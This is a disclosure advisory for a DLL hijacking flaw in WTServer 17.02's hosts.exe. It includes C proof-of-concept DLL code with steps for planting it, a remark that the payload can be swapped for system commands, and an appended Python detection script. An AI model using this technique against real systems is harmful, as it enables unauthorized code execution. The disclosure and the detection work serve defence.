[+] Title: WTServer-17.02 - DLL Loading Arbitrary Code Execution
[+] Credits / Discovery: Nassim Asrir
[+] Author Email: wassline@gmail.com
[+] Author Company: Henceforth

Vendor:
===============

http://wtserver.wtriple.com/
  
 
Download:
===========

https://sourceforge.net/projects/wtnmp/files/latest/download?source=directory

About Product:
===============

WTServer - Nginx MariaDB Redis Php development stack for Windows

A lightweight, fast and stable server stack for developing php mysql applications on windows, based on the excellent webserver Nginx. A lighter alternative to XAMPP and WAMP.


Package contains:
- Nginx 1.11.10 web server
- MariaDB 10.1.21 database server, mysql replacement (32/64bit)
- Redis 3.2 Cache/NoSql, memcached alternative (64bit)
- Php 5.6.30 & PHP 7.0.16 & PHP 7.1.2 scripting language (32/64bit)
- WinSCP SFTP client
- HTTPS using free LetsEncrypt certificates
- Composer dependency manager for php
- Adminer web based database manager
- Reg.php regular expressions tester
- WTServer Manager (32/64bit), formerly known as *wt-nmp* 
 
Vulnerability Type:
===================

DLL Loading Arbitrary Code Execution.


Information:
===================

The vulnerable program in WTServer is "hosts.exe", and the vulnerable DLL is "api-ms-win-appmodel-runtime-l1-1-0.dll".


POC:
===================
Download the POC from GitHub and compile it with "CodeBlocks" or "GCC".

https://gist.github.com/Nassim-Asrir/8f9a97919e84c4cddc491b317672172b

Data:

// Compile this code and rename it to "api-ms-win-appmodel-runtime-l1-1-0.dll" then copy it to "C:\WTServer\bin\HostsEditor" then launch "hosts.exe"
// For any information contact me at: wassline@gmail.com

#include "main.h"

#include <windows.h>
#define DllExport __declspec (dllexport)

// Shows a message box as visible proof that the DLL was loaded.
int mes()
{
  MessageBox(0, "DLL Hijacking Vulnerable", "Nassim Asrir", MB_OK);
  return 0;
}

// DLL entry point, called by the loader when hosts.exe loads the DLL.
BOOL WINAPI DllMain(
            HINSTANCE hinstDLL,
            DWORD     fdwReason,
            LPVOID    lpvReserved)
{
  mes();
  return TRUE;
}


- Download the POC, compile it, and copy it to "C:\WTServer\bin\HostsEditor", then launch "hosts.exe". You will see the MessageBox; the code can also be modified to launch a system command (calc or ....).
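
A detection-side check for the load described above, as an added example that is not part of the original advisory: it flags image-load events where an API-set-named DLL is loaded from outside the Windows system directories without a valid Microsoft signature. The events are constructed samples using Sysmon Event ID 7 field names; the trusted directory list and signer names are assumptions.

```python
import ntpath
import re

# API-set style names (api-ms-*, ext-ms-*), such as the DLL named in this advisory.
API_SET_NAME = re.compile(r"^(api|ext)-ms-[a-z0-9-]+\.dll$", re.IGNORECASE)
# Assumptions: Windows lives in C:\Windows; these signer names are the ones trusted.
TRUSTED_DIRS = (r"c:\windows\system32", r"c:\windows\syswow64", r"c:\windows\winsxs")
TRUSTED_SIGNERS = {"Microsoft Windows", "Microsoft Corporation"}

def is_trusted_location(path):
    """True if the DLL was loaded from a Windows system directory."""
    folder = ntpath.normpath(ntpath.dirname(path)).lower()
    return any(folder == d or folder.startswith(d + "\\") for d in TRUSTED_DIRS)

def has_valid_microsoft_signature(event):
    """App-local UCRT copies (api-ms-win-crt-*.dll) are legitimate and signed."""
    return (event.get("Signed", "").lower() == "true"
            and event.get("SignatureStatus") == "Valid"
            and event.get("Signature") in TRUSTED_SIGNERS)

def suspicious_loads(events):
    """Return loads of API-set-named DLLs from untrusted, unsigned locations."""
    hits = []
    for ev in events:
        name = ntpath.basename(ev["ImageLoaded"])
        if not API_SET_NAME.match(name):
            continue
        if is_trusted_location(ev["ImageLoaded"]) or has_valid_microsoft_signature(ev):
            continue
        hits.append(ev)
    return hits

# Constructed sample events (not real logs), Sysmon Event ID 7 field names.
SAMPLE_EVENTS = [
    {"Image": r"C:\WTServer\bin\HostsEditor\hosts.exe",
     "ImageLoaded": r"C:\WTServer\bin\HostsEditor\api-ms-win-appmodel-runtime-l1-1-0.dll",
     "Signed": "false", "Signature": "", "SignatureStatus": "Unavailable"},
    {"Image": r"C:\WTServer\bin\HostsEditor\hosts.exe",
     "ImageLoaded": r"C:\Windows\System32\kernel32.dll",
     "Signed": "true", "Signature": "Microsoft Windows", "SignatureStatus": "Valid"},
    {"Image": r"C:\Tools\app.exe",
     "ImageLoaded": r"C:\Tools\api-ms-win-crt-runtime-l1-1-0.dll",
     "Signed": "true", "Signature": "Microsoft Windows", "SignatureStatus": "Valid"},
]

if __name__ == "__main__":
    for ev in suspicious_loads(SAMPLE_EVENTS):
        print("ALERT:", ev["Image"], "loaded", ev["ImageLoaded"])
```
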
 
 
CVE Reference:
===============

N/A
 
 
Tested on:
=============== 

Windows 7

Windows XP